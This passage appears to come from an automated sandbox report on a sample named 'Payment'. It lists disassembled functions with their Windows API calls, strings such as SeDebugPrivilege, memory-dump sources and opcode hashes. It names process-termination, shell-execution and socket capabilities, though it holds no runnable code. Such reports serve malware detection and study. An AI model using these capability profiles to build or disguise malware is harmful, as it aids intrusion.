                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                          • String ID: NULL Pointer assignment
                                                          • API String ID: 1300414916-2785691316
                                                          • Opcode ID: c6b7331fe9c3ceba02d009f2c3f9a71c0e25e8d23c7c86c5e72cdb69d7e3ab1f
                                                          • Instruction ID: 37395be8beac758f28c54b22e6873b7dc606a22a57716b74c811aa93690cef8e
                                                          • Opcode Fuzzy Hash: c6b7331fe9c3ceba02d009f2c3f9a71c0e25e8d23c7c86c5e72cdb69d7e3ab1f
                                                          • Instruction Fuzzy Hash: B6912A71D00229EBDF10DFA4DD85ADEBBB9EF08710F2041AAF519A7251DB719A44CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B57093
                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00B570A7
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B570C1
                                                          • _wcscat.LIBCMT ref: 00B5711C
                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B57133
                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B57161
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window_wcscat
                                                          • String ID: SysListView32
                                                          • API String ID: 307300125-78025650
                                                          • Opcode ID: b1b1b037e37717ce271561a0cde11d09c0efdf6b3f94ab6d5f916e8af5a5c9d8
                                                          • Instruction ID: d826840edf1cced358c68d07800f2791ca91a810f60217adc6dee735d2777bd9
                                                          • Opcode Fuzzy Hash: b1b1b037e37717ce271561a0cde11d09c0efdf6b3f94ab6d5f916e8af5a5c9d8
                                                          • Instruction Fuzzy Hash: F441A371A44309AFDB219FA4DC85BEEB7E8EF08351F1005EAF944E72D1DA719D888B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00B33E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00B33EB6
                                                            • Part of subcall function 00B33E91: Process32FirstW.KERNEL32(00000000,?), ref: 00B33EC4
                                                            • Part of subcall function 00B33E91: CloseHandle.KERNEL32(00000000), ref: 00B33F8E
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B4ECB8
                                                          • GetLastError.KERNEL32 ref: 00B4ECCB
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B4ECFA
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B4ED77
                                                          • GetLastError.KERNEL32(00000000), ref: 00B4ED82
                                                          • CloseHandle.KERNEL32(00000000), ref: 00B4EDB7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2533919879-2896544425
                                                          • Opcode ID: 11f2a01394743df463ba65a19bb2ad8ee0d945ebd40edb60ac8d883fbc4215c1
                                                          • Instruction ID: 57be135290d7b7bd8acd7882b10dfdd0008a98374ba166a3b4126ed0c162a87c
                                                          • Opcode Fuzzy Hash: 11f2a01394743df463ba65a19bb2ad8ee0d945ebd40edb60ac8d883fbc4215c1
                                                          • Instruction Fuzzy Hash: 3D4195316002119FDB14EF24CC95F6EB7E1BF80714F1880A9F8469B2A2CBB4E904CB96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadIconW.USER32(00000000,00007F03), ref: 00B332C5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: IconLoad
                                                          • String ID: blank$info$question$stop$warning
                                                          • API String ID: 2457776203-404129466
                                                          • Opcode ID: c406bc89c2772ad9c848cb96f8bccfd3e608be5c5bf0412e25039df37c3ebaf2
                                                          • Instruction ID: 0d49f7d4d6cc9f89a83fba557828aaad5ea2f52dba3d121af704af2a70558ce7
                                                          • Opcode Fuzzy Hash: c406bc89c2772ad9c848cb96f8bccfd3e608be5c5bf0412e25039df37c3ebaf2
                                                          • Instruction Fuzzy Hash: 6C11E73260834ABAEB016A94DC82D7BB7DCDF19B70F3000EAF601A6191EAA55F4046B5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B3454E
                                                          • LoadStringW.USER32(00000000), ref: 00B34555
                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B3456B
                                                          • LoadStringW.USER32(00000000), ref: 00B34572
                                                          • _wprintf.LIBCMT ref: 00B34598
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B345B6
                                                          Strings
                                                          • %s (%d) : ==> %s: %s %s, xrefs: 00B34593
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                          • API String ID: 3648134473-3128320259
                                                          • Opcode ID: b5e26b043183512156b7e96680a4502342ae08c9fc40d837d2ba1a4947fea85c
                                                          • Instruction ID: 7a14f62fa3639396472b2bee81fa90a8f940e46e8b8c6c06813cadbdcf96191f
                                                          • Opcode Fuzzy Hash: b5e26b043183512156b7e96680a4502342ae08c9fc40d837d2ba1a4947fea85c
                                                          • Instruction Fuzzy Hash: 3B012CF2900209BBE711A7A0DD89FFBB6ACDB08702F0005E5BB45E3051EA749E858B70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD2612: GetWindowLongW.USER32(?,000000EB), ref: 00AD2623
                                                          • GetSystemMetrics.USER32(0000000F), ref: 00B5D78A
                                                          • GetSystemMetrics.USER32(0000000F), ref: 00B5D7AA
                                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00B5D9E5
                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B5DA03
                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B5DA24
                                                          • ShowWindow.USER32(00000003,00000000), ref: 00B5DA43
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00B5DA68
                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00B5DA8B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                          • String ID:
                                                          • API String ID: 1211466189-0
                                                          • Opcode ID: 93049c74b6bc3420064a0a1950ab376455b373e4ba3a064088653f6979d03be1
                                                          • Instruction ID: fa3cb37ae3c22b53eee6b4ba09bbca36a6f20948ae4f3fef3910c62ced9776ba
                                                          • Opcode Fuzzy Hash: 93049c74b6bc3420064a0a1950ab376455b373e4ba3a064088653f6979d03be1
                                                          • Instruction Fuzzy Hash: 3AB15871600215ABDF24CF69C9C57BA7BF1FF48702F0882E9ED489B295DB34A954CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B0C417,00000004,00000000,00000000,00000000), ref: 00AD2ACF
                                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00B0C417,00000004,00000000,00000000,00000000,000000FF), ref: 00AD2B17
                                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00B0C417,00000004,00000000,00000000,00000000), ref: 00B0C46A
                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B0C417,00000004,00000000,00000000,00000000), ref: 00B0C4D6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          • Opcode ID: 4027e22dd6dafcdfb55b566637af5ea6b3c2d3ec976c7ba1205f056f754ecdb8
                                                          • Instruction ID: d6eb3eac548bc539b7cb18405ccf2997b62a650008125d4337debc9234344341
                                                          • Opcode Fuzzy Hash: 4027e22dd6dafcdfb55b566637af5ea6b3c2d3ec976c7ba1205f056f754ecdb8
                                                          • Instruction Fuzzy Hash: 8E41E2352087809AD7358B288DDCB7A7FE2FBA5340F58899BE047877B1CA75A841D710
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B3737F
                                                            • Part of subcall function 00AF0FF6: std::exception::exception.LIBCMT ref: 00AF102C
                                                            • Part of subcall function 00AF0FF6: __CxxThrowException@8.LIBCMT ref: 00AF1041
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00B373B6
                                                          • EnterCriticalSection.KERNEL32(?), ref: 00B373D2
                                                          • _memmove.LIBCMT ref: 00B37420
                                                          • _memmove.LIBCMT ref: 00B3743D
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00B3744C
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00B37461
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B37480
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 256516436-0
                                                          • Opcode ID: dc2b8cc3633b05e5a83edb533735c5269de93369ecff2786d68bd801b891d89c
                                                          • Instruction ID: 571d8252c3d73b1e72d4a5808f52a3a0224a88478b0a49769fb82ba73bf8bc23
                                                          • Opcode Fuzzy Hash: dc2b8cc3633b05e5a83edb533735c5269de93369ecff2786d68bd801b891d89c
                                                          • Instruction Fuzzy Hash: 96316D71904205EBCF10DFA4DD85ABABBB8EF44711F2441A5FA04AB256DF319A10CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 00B5645A
                                                          • GetDC.USER32(00000000), ref: 00B56462
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B5646D
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00B56479
                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B564B5
                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B564C6
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B59299,?,?,000000FF,00000000,?,000000FF,?), ref: 00B56500
                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B56520
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                          • String ID:
                                                          • API String ID: 3864802216-0
                                                          • Opcode ID: 6871f24e16316cd5729754bb8a9edd779d4af24808dc984623e1b34fd4088949
                                                          • Instruction ID: bcdb66b7037916f7e4c152bb5393e38c217b64c73f934884d436e25eba5459e8
                                                          • Opcode Fuzzy Hash: 6871f24e16316cd5729754bb8a9edd779d4af24808dc984623e1b34fd4088949
                                                          • Instruction Fuzzy Hash: 71315A72241214AFEB118F50DC8AFBB7FA9EB19762F0440A5FE089B291DA759841CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          • Opcode ID: 6d621e1e99a88c883a2630259596f1575789ae1319e34cba6264a8a773b0385f
                                                          • Instruction ID: c1b57d418ba97ec6edf862ea34ea9a25ab1cc614db14f94ebc4eee1bebb88e4c
                                                          • Opcode Fuzzy Hash: 6d621e1e99a88c883a2630259596f1575789ae1319e34cba6264a8a773b0385f
                                                          • Instruction Fuzzy Hash: 2921F971740629F7E254A661AD83FBF3BDCEF20799B0400A0FE0DE62D2E755DD2281A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD9997: __itow.LIBCMT ref: 00AD99C2
                                                            • Part of subcall function 00AD9997: __swprintf.LIBCMT ref: 00AD9A0C
                                                            • Part of subcall function 00AEFEC6: _wcscpy.LIBCMT ref: 00AEFEE9
                                                          • _wcstok.LIBCMT ref: 00B3EEFF
                                                          • _wcscpy.LIBCMT ref: 00B3EF8E
                                                          • _memset.LIBCMT ref: 00B3EFC1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                          • String ID: X
                                                          • API String ID: 774024439-3081909835
                                                          • Opcode ID: 9d6276467a8e541f3d6be20c6054b098d2b6c02672ac4f28b16c3bb04055a90b
                                                          • Instruction ID: 400dc5d1d371a5e4ea29cd176e63765f23659c7f77506678c7a40ea7a209806e
                                                          • Opcode Fuzzy Hash: 9d6276467a8e541f3d6be20c6054b098d2b6c02672ac4f28b16c3bb04055a90b
                                                          • Instruction Fuzzy Hash: 00C14C715087019FC724EF24D985A6EB7E4EF84310F14496EF89A9B3A2DB70ED45CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00B46F14
                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B46F35
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B46F48
                                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 00B46FFE
                                                          • inet_ntoa.WSOCK32(?), ref: 00B46FBB
                                                            • Part of subcall function 00B2AE14: _strlen.LIBCMT ref: 00B2AE1E
                                                            • Part of subcall function 00B2AE14: _memmove.LIBCMT ref: 00B2AE40
                                                          • _strlen.LIBCMT ref: 00B47058
                                                          • _memmove.LIBCMT ref: 00B470C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                          • String ID:
                                                          • API String ID: 3619996494-0
                                                          • Opcode ID: 3ec2932f7dcd12a2c6940baa9cd68d18a6cee8096d5fde725651a3a522d2f906
                                                          • Instruction ID: 743cff854c702ccfa1cdaf3be472e027410fdb5a1f55815a35cf16e71b205b2e
                                                          • Opcode Fuzzy Hash: 3ec2932f7dcd12a2c6940baa9cd68d18a6cee8096d5fde725651a3a522d2f906
                                                          • Instruction Fuzzy Hash: 0081BB71548300ABD710EB24CC86F6BB7E9EF88714F10495AB5569B3A2DF70EE05CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 39053bc5b71605579bb244f78eb770a0de902da97b58e38e07a7f1c9010dc79e
                                                          • Instruction ID: 93b1835d74f84ecddc1588cd040f86816ff73b2a5f3ae76a4e9014072e797910
                                                          • Opcode Fuzzy Hash: 39053bc5b71605579bb244f78eb770a0de902da97b58e38e07a7f1c9010dc79e
                                                          • Instruction Fuzzy Hash: E2714D70900109FFCB049F98CD89EBEBB79FF85314F14815AF916AB291C734AA51CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • IsWindow.USER32(01485E80), ref: 00B5B6A5
                                                          • IsWindowEnabled.USER32(01485E80), ref: 00B5B6B1
                                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B5B795
                                                          • SendMessageW.USER32(01485E80,000000B0,?,?), ref: 00B5B7CC
                                                          • IsDlgButtonChecked.USER32(?,?), ref: 00B5B809
                                                          • GetWindowLongW.USER32(01485E80,000000EC), ref: 00B5B82B
                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B5B843
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                          • String ID:
                                                          • API String ID: 4072528602-0
                                                          • Opcode ID: 75753972c5bb8105b436144798a86df481600a0809c7f25eb197c5d7d916a0ef
                                                          • Instruction ID: f218e1dd72dad9a6c98ed7477a53087bee7e4be4ddeb1fce49c50ce08d8894f8
                                                          • Opcode Fuzzy Hash: 75753972c5bb8105b436144798a86df481600a0809c7f25eb197c5d7d916a0ef
                                                          • Instruction Fuzzy Hash: 6A716B34600204AFEB249F64C8D4FBABBF9EF49342F1444E9ED56972A1CB31AD49DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _memset.LIBCMT ref: 00B4F75C
                                                          • _memset.LIBCMT ref: 00B4F825
                                                          • ShellExecuteExW.SHELL32(?), ref: 00B4F86A
                                                            • Part of subcall function 00AD9997: __itow.LIBCMT ref: 00AD99C2
                                                            • Part of subcall function 00AD9997: __swprintf.LIBCMT ref: 00AD9A0C
                                                            • Part of subcall function 00AEFEC6: _wcscpy.LIBCMT ref: 00AEFEE9
                                                          • GetProcessId.KERNEL32(00000000), ref: 00B4F8E1
                                                          • CloseHandle.KERNEL32(00000000), ref: 00B4F910
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                          • String ID: @
                                                          • API String ID: 3522835683-2766056989
                                                          • Opcode ID: fd9e9dc00594aefd6e7cde6d9c09b4dbc3892fe1f6f7082d7479f16a836cd76c
                                                          • Instruction ID: 1e4509e0456eb7bbde01c73d0d216da5d0e25f4a37bd86765883401436b4dc44
                                                          • Opcode Fuzzy Hash: fd9e9dc00594aefd6e7cde6d9c09b4dbc3892fe1f6f7082d7479f16a836cd76c
                                                          • Instruction Fuzzy Hash: C1617375A00619DFCF14DF54C5919AEBBF5FF48310B1484AAE856AB361CB30EE41CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetParent.USER32(?), ref: 00B3149C
                                                          • GetKeyboardState.USER32(?), ref: 00B314B1
